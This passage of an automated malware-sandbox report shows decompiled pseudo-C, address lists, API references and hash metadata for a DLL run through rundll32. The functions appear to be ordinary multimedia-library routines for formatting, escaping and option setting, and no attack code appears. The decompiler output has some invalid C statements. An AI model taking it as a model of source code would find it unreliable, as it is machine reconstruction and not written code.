												if(__eax == 2) {
													__edx =  *(__edi + 8);
													__eax = __ebp + __ebp * 2;
													__eax =  *(__edi + 8) + (__ebp + __ebp * 2) * 8;
													__ecx =  *( *(__edi + 8) + (__ebp + __ebp * 2) * 8);
													__ebx = __ecx - 0x400;
													if(__ebp != 0) {
														__esp[4] = __ecx;
														__eax = 0x100aeacf;
														__esp[1] = 0x100aeacf;
														__eax = __esp[6];
														 *__esp = __esp[6];
														__eax = L100089C0();
														__ecx = __esp[4];
													}
													if(__ebx > 0x3ff) {
														goto L38;
													}
													L36:
													__esp[2] = __ebx;
													__eax = "AMBI%d";
													__esp[1] = "AMBI%d";
													__eax = __esp[6];
													 *__esp = __esp[6];
													__eax = L100089C0();
													continue;
												}
												if(__eax == 3) {
													__eax =  *(__edi + 8);
													__edx =  *(__edi + 0xc);
													__esp[4] = __eax;
													__ebx = __eax;
													__ecx = __eax;
													__esp[5] =  *(__edi + 0xc);
													__eax >> 1 = __eax >> 0x00000001 & 0x55555555;
													__ecx = __eax - (__eax >> 0x00000001 & 0x55555555);
													__ebx = __ecx;
													__ecx = __ecx >> 2;
													__ebx = __ebx & 0x33333333;
													__ecx = __ecx & 0x33333333;
													__ecx =  &(__ecx[__ebx]);
													__ecx = __ecx >> 4;
													__ecx =  &(__ecx[__ecx >> 4]);
													__ecx = __ecx & 0x0f0f0f0f;
													__ebx =  &(__ecx[__ecx >> 8]);
													__ecx = __esp[5];
													__eax = __ebx;
													__ecx = __ecx >> 1;
													__ecx >> 1 = __ecx >> 0x00000001 & 0x55555555;
													__ecx = __ecx - (__ecx >> 0x00000001 & 0x55555555);
													__eax = __eax >> 0x10;
													__edx = __ecx;
													__ecx = __ecx >> 2;
													__edx = __edx & 0x33333333;
													__ecx = __ecx & 0x33333333;
													__ebx = (__eax >> 0x10) + __eax;
													__ecx =  &(__ecx[__edx]);
													__eax = (__eax >> 0x10) + __eax;
													__edx = __ecx;
													__eax = __eax & 0x0000003f;
													__edx = __ecx >> 4;
													__ecx =  &(__ecx[__ecx >> 4]);
													__ecx = __ecx & 0x0f0f0f0f;
													__ecx = __ecx >> 8;
													__ecx =  &(__ecx[__ecx >> 8]);
													__ecx = __ecx >> 0x10;
													__ebx =  &(__ecx[__ecx >> 0x10]);
													__ebx =  &(__ecx[__ecx >> 0x10]) & 0x0000003f;
													__ecx = __eax + ( &(__ecx[__ecx >> 0x10]) & 0x0000003f);
													__ebx = __ebp;
													__esi = __esi - __ecx;
													__ebx = __ebp - __esi;
													if(__ebp >= __esi) {
														__esp[7] = __ebp;
														__eax = __esp[4];
														__ecx = 0;
														__edx = __esp[5];
														__ebp = __edi;
														goto L20;
													}
													__ebx = 0;
													if(__ebp == 0) {
														goto L36;
													}
													__eax = 0x100aeacf;
													__ebx = __ebp;
													__esp[1] = 0x100aeacf;
													__eax = __esp[6];
													_t46 = __ebp + 0x400; // 0x401
													__ecx = _t46;
													__esp[4] = _t46;
													 *__esp = __esp[6];
													__eax = L100089C0();
													__ecx = __esp[4];
													if(__ebp <= 0x3ff) {
														goto L36;
													}
													goto L32;
												}
												if(__eax == 0) {
													goto L16;
												}
												if(__ebp != 0) {
													goto L42;
												}
												goto L9;
											}
											__edx =  *(__edi + 8);
											__eax = __ebp + __ebp * 2;
											__ecx = __edx + __eax * 8;
											if( *((char*)(__edx + 4 + __eax * 8)) == 0) {
												goto L3;
											}
											__eax = __esp[6];
											__ecx =  &(__ecx[4]);
											__ebp = __ebp + 1;
											__esp[2] = __ecx;
											__ecx = "@%s";
											__esp[1] = "@%s";
											 *__esp = __esp[6];
											__eax = L100089C0();
											__esi =  *(__edi + 4);
											if(__esi > __ebp) {
												goto L4;
											}
											goto L14;
										}
									}
									__esp[2] = __eax;
									__eax = "%s";
									__esp[1] = "%s";
									__eax = __esp[6];
									 *__esp = __esp[6];
									__eax = L100089C0();
									goto L10;
								}
								if(__ecx != 0xffffffff) {
									goto L32;
								}
								goto L9;
							}
							if(__ecx > 0x28) {
								goto L32;
							}
							goto L26;
							L19:
							__ecx =  &(__ecx[1]);
						} while (__ecx != 0x40);
						__edi = __ebp;
						__ebp = __esp[7];
						if(__ebp == 0) {
							goto L9;
						}
						goto L42;
					}
				}
			}

0x1000d688
0x1000d688
0x1000d688
0x1000d68b
0x1000d68d
0x1000d690
0x1000d694
0x1000d698
0x1000d698
0x1000d69c
0x1000d6a0
0x1000d6a2
0x1000d6a6
0x1000d6bc
0x1000d6bc
0x1000d6bc
0x1000d6be
0x1000d6c0
0x1000d6c3
0x1000d6c8
0x1000d6ca
0x1000d6ca
0x1000d6cc
0x1000d6d2
0x00000000
0x00000000
0x1000d6d4
0x1000d6d4
0x1000d6d9
0x1000d6b0
0x00000000
0x1000d6b0
0x1000d6db
0x1000d6dd
0x1000d6e3
0x1000d879
0x1000d87d
0x1000d882
0x1000d886
0x1000d88a
0x1000d88d
0x1000d892
0x1000d896
0x1000d899
0x1000d6f2
0x1000d6f2
0x1000d6fb
0x1000d800
0x1000d800
0x1000d804
0x1000d808
0x1000d80d
0x1000d811
0x1000d814
0x00000000
0x1000d620
0x1000d620
0x1000d623
0x1000d5d0
0x1000d5d0
0x1000d5d3
0x1000d5d6
0x1000d660
0x1000d662
0x1000d596
0x1000d8e3
0x1000d8e7
0x1000d8ec
0x1000d8f0
0x1000d8f4
0x1000d8fc
0x1000d668
0x1000d668
0x1000d66c
0x1000d671
0x1000d675
0x1000d67d
0x1000d67d
0x1000d57c
0x1000d57c
0x1000d5dc
0x1000d5de
0x1000d8be
0x1000d8be
0x1000d8c3
0x1000d8c7
0x1000d8cb
0x1000d8ce
0x1000d607
0x1000d607
0x1000d60b
0x1000d610
0x1000d614
0x1000d617
0x00000000
0x1000d617
0x1000d5e4
0x1000d5e9
0x1000d820
0x1000d823
0x1000d829
0x1000d82c
0x1000d82e
0x1000d834
0x1000d836
0x1000d83a
0x1000d83f
0x1000d843
0x1000d847
0x1000d84a
0x1000d84f
0x1000d84f
0x1000d859
0x00000000
0x00000000
0x1000d85b
0x1000d85b
0x1000d85f
0x1000d864
0x1000d868
0x1000d86c
0x1000d86f
0x00000000
0x1000d86f
0x1000d5f2
0x1000d720
0x1000d723
0x1000d726
0x1000d72a
0x1000d72c
0x1000d72e
0x1000d734
0x1000d73a
0x1000d73c
0x1000d73e
0x1000d741
0x1000d747
0x1000d74d
0x1000d751
0x1000d754
0x1000d756
0x1000d761
0x1000d763
0x1000d767
0x1000d76b
0x1000d76f
0x1000d775
0x1000d779
0x1000d77c
0x1000d77e
0x1000d781
0x1000d787
0x1000d78d
0x1000d78f
0x1000d791
0x1000d793
0x1000d795
0x1000d798
0x1000d79b
0x1000d79d
0x1000d7a5
0x1000d7a8
0x1000d7ac
0x1000d7af
0x1000d7b1
0x1000d7b4
0x1000d7b7
0x1000d7b9
0x1000d7bb
0x1000d7bf
0x1000d698
0x1000d69c
0x1000d6a0
0x1000d6a2
0x1000d6a6
0x00000000
0x1000d6a8
0x1000d7c5
0x1000d7c9
0x00000000
0x00000000
0x1000d7cf
0x1000d7d4
0x1000d7d6
0x1000d7da
0x1000d7de
0x1000d7de
0x1000d7e4
0x1000d7e8
0x1000d7eb
0x1000d7f6
0x1000d7fa
0x00000000
0x00000000
0x00000000
0x1000d7fa
0x1000d5f9
0x00000000
0x00000000
0x1000d601
0x00000000
0x00000000
0x00000000
0x1000d601
0x1000d625
0x1000d628
0x1000d631
0x1000d634
0x00000000
0x00000000
0x1000d636
0x1000d63a
0x1000d63d
0x1000d63e
0x1000d642
0x1000d647
0x1000d64b
0x1000d64e
0x1000d653
0x1000d658
0x00000000
0x00000000
0x00000000
0x1000d658
0x1000d620
0x1000d701
0x1000d705
0x1000d70a
0x1000d70e
0x1000d712
0x1000d715
0x00000000
0x1000d715
0x1000d8a2
0x00000000
0x00000000
0x00000000
0x1000d8a8
0x1000d6ec
0x00000000
0x00000000
0x00000000
0x1000d6b2
0x1000d6b2
0x1000d6b3
0x1000d8b0
0x1000d8b2
0x1000d8b8
0x00000000
0x00000000
0x00000000
0x1000d8b8
0x1000d698

APIs

mv_bprintf.MAIN ref: 1000D64E
mv_bprintf.MAIN ref: 1000D678
mv_bprintf.MAIN ref: 1000D715

Strings

@%s, xrefs: 1000D642

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_bprintf
String ID: @%s
API String ID: 3083893021-2921637043
Opcode ID: 3226884ed7a48c89542cb2da4cd6bdc3bde8d4d284e963f694dc1568948eeeaa
Instruction ID: 3992f4aefadd0f47064a5f8236616475ea9e2f99c0eaa1b511875076a351044c
Opcode Fuzzy Hash: 3226884ed7a48c89542cb2da4cd6bdc3bde8d4d284e963f694dc1568948eeeaa
Instruction Fuzzy Hash: F32128719087168BE350EF59C48022EF7E1FB98394F12892EE89897315E731ED55CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 1002E5D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

mv_expr_parse_and_eval.MAIN ref: 1002E659

Part of subcall function 100177F0: mv_expr_parse.MAIN ref: 10017862
Part of subcall function 100177F0: mv_expr_free.MAIN ref: 100178D7
Part of subcall function 100177F0: mv_expr_free.MAIN ref: 100178E6
Part of subcall function 100177F0: mv_expr_free.MAIN ref: 100178F5
Part of subcall function 100177F0: mv_freep.MAIN ref: 10017904
Part of subcall function 100177F0: mv_freep.MAIN ref: 1001790C
Part of subcall function 100177F0: mv_expr_free.MAIN ref: 10017926
Part of subcall function 100177F0: mv_expr_free.MAIN ref: 10017935
Part of subcall function 100177F0: mv_expr_free.MAIN ref: 10017944
Part of subcall function 100177F0: mv_freep.MAIN ref: 10017953
Part of subcall function 100177F0: mv_freep.MAIN ref: 1001795B

mv_d2q.MAIN ref: 1002E675
mv_reduce.MAIN ref: 1002E6C9

Strings

%d:%d%c, xrefs: 1002E5EF

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_expr_free$mv_freep$mv_d2qmv_expr_parsemv_expr_parse_and_evalmv_reduce
String ID: %d:%d%c
API String ID: 3833080124-2624059611
Opcode ID: c0dab5111b246b7793677cbea3694c592915a4b51e12e4901537c35080ba4451
Instruction ID: 32cee4adaa6e940534327489766bd4286550dcd166c12c6ab9e9ab54eb2fc32a
Opcode Fuzzy Hash: c0dab5111b246b7793677cbea3694c592915a4b51e12e4901537c35080ba4451
Instruction Fuzzy Hash: 143157B59193419FC740DF29C58010AFBE1BF89784F458D2EF989DB311E7B0E9448B82

Uniqueness

Uniqueness Score: -1.00%

Function 10029794 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 100292C3
mv_log.MAIN ref: 100292ED
mv_log.MAIN ref: 10029391
mv_log.MAIN ref: 1002977B

Strings

%-15s , xrefs: 100292D4

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_log$strcmp
String ID: %-15s
API String ID: 1163046698-755444208
Opcode ID: 95967de6711d041c351af1bc06a49e10b9f53db266bf100d43d0bd2239a687f0
Instruction ID: ce635d268765be07717733ae1f701fccf88d57a4aae717667b6e3b1a655ee8de
Opcode Fuzzy Hash: 95967de6711d041c351af1bc06a49e10b9f53db266bf100d43d0bd2239a687f0
Instruction Fuzzy Hash: 8B21B278A093459FCB50DF28E09069EB7E1EF88B80F92C82DE89997351D374E940DB42

Uniqueness

Uniqueness Score: -1.00%

Function 1002E6E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 1002E70F

Strings

ntsc, xrefs: 1002E6E1

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: strcmp
String ID: ntsc
API String ID: 1004003707-2045543799
Opcode ID: 45332122925daee58b0ca36453adb93a54a139fa692ca5e16f6db20bb7fad8e3
Instruction ID: a92f6e95659317827b4528b13064fbf16e1d4fcf51acc17d8aa5f4157741274d
Opcode Fuzzy Hash: 45332122925daee58b0ca36453adb93a54a139fa692ca5e16f6db20bb7fad8e3
Instruction Fuzzy Hash: A5111CB4A483829FE300DF69E4C065ABBE5EF85340F95896AF49897361D370EC81DB42

Uniqueness

Uniqueness Score: -1.00%

Function 1002F736 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

mv_small_strptime.MAIN ref: 1002F750
_errno.MSVCRT ref: 1002F76D

Part of subcall function 1008F920: _errno.MSVCRT ref: 1008FAD0

_errno.MSVCRT ref: 1002F7A6

Strings

%M:%S, xrefs: 1002F744

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: _errno$mv_small_strptime
String ID: %M:%S
API String ID: 1751681387-2500880230
Opcode ID: f2beb3df4ee0f6f61ca7a34fa68ce2ceebecdb36893305a6cf37f0a46d557ff3
Instruction ID: 08dd91ef31b92b14981fe1afeff638f908fd3777591abbf69ec9e5e015226bf1
Opcode Fuzzy Hash: f2beb3df4ee0f6f61ca7a34fa68ce2ceebecdb36893305a6cf37f0a46d557ff3
Instruction Fuzzy Hash: 10010C75A05305DFD764DF29D45076EBBE0FB84280F51883EE899C3250EA3098458F92

Uniqueness

Uniqueness Score: -1.00%

Function 1002D72B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E1002D72B(intOrPtr* __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr* __ebp, void* __fp0, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, char* _a40, intOrPtr _a44, char _a60) {
				intOrPtr* _t27;
				intOrPtr _t32;
				char* _t36;
				intOrPtr* _t40;
				intOrPtr _t49;
				intOrPtr _t52;
				intOrPtr* _t55;
				intOrPtr* _t58;
				void* _t64;

				_t64 = __fp0;
				_t55 = __ebp;
				_t52 = __esi;
				_t49 = __edi;
				_t40 = __ebx;
				while(1) {
					L6:
					_a12 = 0;
					_a8 = _a4;
					_a4 =  *_t55;
					_t36 =  &_a60;
					 *_t58 = _t36;
					_a40 = _t36;
					_t32 = E10011210(_t40, _t49, _t52, _t55);
					if(_t32 >= 0) {
						goto L1;
					} else {
						break;
					}
					while(1) {
						L1:
						_a8 = _t55;
						_a12 = 2;
						_a4 = 0x100b3f1d;
						 *_t58 =  *_t40;
						_t27 = E100110D0();
						_t55 = _t27;
						if(_t27 == 0) {
							break;
						}
						_a12 = _t49;
						_a8 = _a4;
						 *_t58 = _t52;
						_a4 =  *_t55;
						_t32 = L1002CB80(_t40, _t49, _t52, _t55, _t64);
						if(_t32 == 0xabafb008) {
							goto L6;
						} else {
							if(_t32 >= 0) {
								continue;
							} else {
								_a40 =  &_a60;
								L5:
								_a44 = _t32;
								_a16 = _a4;
								_a8 = "Error setting option %s to value %s.\n";
								_a4 = 0x10;
								 *_t58 = _t52;
								_a12 =  *_t55;
								L10023A40();
								 *_t58 = _a40;
								L10011CC0();
								return _a44;
							}
						}
						L10:
					}
					 *_t58 = _t40;
					L10011CC0();
					 *_t40 = _a60;
					return 0;
					goto L10;
				}
				goto L5;
			}

0x1002d72b
0x1002d72b
0x1002d72b
0x1002d72b
0x1002d72b
0x1002d730
0x1002d730
0x1002d732
0x1002d739
0x1002d740
0x1002d744
0x1002d748
0x1002d74b
0x1002d74f
0x1002d756
0x00000000
0x00000000
0x00000000
0x00000000
0x1002d690
0x1002d690
0x1002d690
0x1002d69e
0x1002d6a2
0x1002d6a8
0x1002d6ab
0x1002d6b2
0x1002d6b4
0x00000000
0x00000000
0x1002d6ba
0x1002d6c1
0x1002d6c8
0x1002d6cb
0x1002d6cf
0x1002d6d9
0x00000000
0x1002d6db
0x1002d6dd
0x00000000
0x1002d6df
0x1002d6e3
0x1002d6e7
0x1002d6e7
0x1002d6f3
0x1002d6ff
0x1002d703
0x1002d707
0x1002d70a
0x1002d70e
0x1002d717
0x1002d71a
0x1002d72a
0x1002d72a
0x1002d6dd
0x00000000
0x1002d6d9
0x1002d760
0x1002d763
0x1002d76c
0x1002d777
0x00000000
0x1002d777
0x00000000

APIs

mv_dict_get.MAIN ref: 1002D6AB
mv_opt_set.MAIN ref: 1002D6CF
mv_log.MAIN ref: 1002D70E
mv_dict_free.MAIN ref: 1002D71A
mv_dict_set.MAIN ref: 1002D74F

Strings

Error setting option %s to value %s., xrefs: 1002D6F7

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_dict_freemv_dict_getmv_dict_setmv_logmv_opt_set
String ID: Error setting option %s to value %s.
API String ID: 1354616078-3279051434
Opcode ID: be12c7fe19db5ab61db51b4a1bede206e01a94ada12606f0a4e7e7a9321a0867
Instruction ID: 6b9ea6aabfc4124447e1f2434b6fc2a42ecd06c72756f075168a49251e9f20a7
Opcode Fuzzy Hash: be12c7fe19db5ab61db51b4a1bede206e01a94ada12606f0a4e7e7a9321a0867
Instruction Fuzzy Hash: B6017AB9A08304AFC744DF28D48059ABBE0FB88354F10892EF99CD7310E634EA409F86

Uniqueness

Uniqueness Score: -1.00%

Function 10009784 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10009784(signed int __eax, void* __ebx, intOrPtr __esi, intOrPtr _a4, char* _a8) {
				signed int _t10;
				void* _t21;
				intOrPtr _t28;
				intOrPtr* _t32;
				void* _t37;

				_t28 = __esi;
				_t21 = __ebx;
				_t10 = __eax;
				L1:
				while(1) {
					L1:
					if(_t10 == 0x22) {
						 *_t32 = _t28;
						_a8 = "&quot;";
						_a4 = 0x100ac500;
						L100089C0();
					} else {
						if(_t10 != 0x26) {
							L10:
							E100086F0(_t28, _t10);
						} else {
							 *_t32 = _t28;
							_a8 = 0x100ac508;
							_a4 = 0x100ac500;
							L100089C0();
							while(1) {
								L4:
								_t10 =  *(_t21 + 1) & 0x000000ff;
								_t21 = _t21 + 1;
								if(_t10 == 0) {
									break;
								}
								_t37 = _t10 - 0x3c;
								if(_t37 == 0) {
									 *_t32 = _t28;
									_a8 = 0x100ac50e;
									_a4 = 0x100ac500;
									L100089C0();
									continue;
								} else {
									if(_t37 <= 0) {
										goto L1;
									} else {
										if(_t10 != 0x3e) {
											goto L10;
										} else {
											 *_t32 = _t28;
											_a8 = 0x100ac513;
											_a4 = 0x100ac500;
											L100089C0();
											continue;
										}
									}
								}
								L13:
							}
							return _t10;
							goto L13;
						}
					}
					goto L4;
				}
			}

0x10009784
0x10009784
0x10009784
0x00000000
0x10009788
0x10009788
0x1000978a
0x10009c50
0x10009c58
0x10009c61
0x10009c65
0x10009790
0x10009792
0x10009b80
0x10009b85
0x10009798
0x10009798
0x100097a0
0x100097a9
0x100097ad
0x100097c0
0x100097c0
0x100097c0
0x100097c4
0x100097c7
0x00000000
0x00000000
0x100097cd
0x100097cf
0x10009bf0
0x10009bfd
0x10009c01
0x10009c05
0x00000000
0x100097d5
0x100097d5
0x00000000
0x100097d7
0x100097e0
0x00000000
0x100097e6
0x100097e6
0x100097f3
0x100097f7
0x100097fb
0x00000000
0x100097fb
0x100097e0
0x100097d5
0x00000000
0x100097cf
0x10009869
0x00000000
0x10009869
0x10009792
0x00000000
0x1000978a

APIs

mv_bprintf.MAIN(?,?,?,?,?,?,?,?,?,?,100070AF), ref: 100097AD
mv_bprintf.MAIN(?,?,?,?,?,?,?,?,?,?,100070AF), ref: 100097FB
mv_bprintf.MAIN(?,?,?,?,?,?,?,?,?,?,100070AF), ref: 10009C05
mv_bprintf.MAIN(?,?,?,?,?,?,?,?,?,?,100070AF), ref: 10009C65

Strings

&, xrefs: 1000979B
>, xrefs: 100097E9

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_bprintf
String ID: &$>
API String ID: 3083893021-624094588
Opcode ID: 3a0184e92dcb7e1e473096fa467e9c05a6d80c2d3150c9be7b04146b26d57726
Instruction ID: 4c5438aa6a129c9ce896481cefdf623b6b0dbe5659d14e32da422b5388819884
Opcode Fuzzy Hash: 3a0184e92dcb7e1e473096fa467e9c05a6d80c2d3150c9be7b04146b26d57726
Instruction Fuzzy Hash: 0EF03071C08B59CADB50EF68855079AB7E5EB853D0F86480EE4DA9B209C734FC86C782

Uniqueness

Uniqueness Score: -1.00%

Function 1002D35B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

mv_log.MAIN ref: 1002D379

Strings

Key '%s' not found., xrefs: 1002D364

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_log
String ID: Key '%s' not found.
API String ID: 2418673259-2052305073
Opcode ID: b6e5dbdcddb3e8e537d9606f4ee5ef41b23fddcb67c58fcbb9e80a7253b86ab3
Instruction ID: 2935cc58392a1398e58e060f8426a77ac91e2dc20dd80442988a03116b7c0377
Opcode Fuzzy Hash: b6e5dbdcddb3e8e537d9606f4ee5ef41b23fddcb67c58fcbb9e80a7253b86ab3
Instruction Fuzzy Hash: CBE075755087509FC304DF28E48111EFBE0EF88354F41C82EE5CD97315DA75E4418B82

Uniqueness

Uniqueness Score: -1.00%

Function 100252E3 Relevance: 6.2, APIs: 4, Instructions: 158COMMON

Download Yara Rule

APIs

mv_mul_q.MAIN ref: 10025352

Part of subcall function 10032DA0: mv_reduce.MAIN(?,?,?,?,?,?,?,?,?,?,?,?,10025357), ref: 10032DE1

mv_rescale_rnd.MAIN ref: 100253F3
mv_rescale_rnd.MAIN ref: 10025420

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
